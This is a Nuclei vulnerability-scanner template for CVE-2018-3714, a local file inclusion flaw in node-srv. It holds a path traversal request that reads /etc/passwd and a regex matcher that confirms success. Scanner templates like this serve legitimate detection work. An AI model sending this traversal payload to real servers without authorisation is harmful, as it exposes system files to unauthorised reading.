nuclei-templates/cves/2018/CVE-2018-3714.yaml

33 lines
873 B
YAML

id: CVE-2018-3714
info:
name: node-srv - Local File Inclusion
author: madrobot
severity: medium
description: node-srv is vulnerable to local file inclusion due to lack of url validation, which allows a malicious user to read content of any file with known path.
reference:
- https://hackerone.com/reports/309124
- https://nvd.nist.gov/vuln/detail/CVE-2018-3714
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N
cvss-score: 6.5
cve-id: CVE-2018-3714
cwe-id: CWE-22
tags: cve,cve2018,nodejs,lfi,hackerone
requests:
- method: GET
path:
- "{{BaseURL}}/node_modules/../../../../../etc/passwd"
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: regex
regex:
- "root:.*:0:0:"
part: body
# Enhanced by mp on 2022/07/22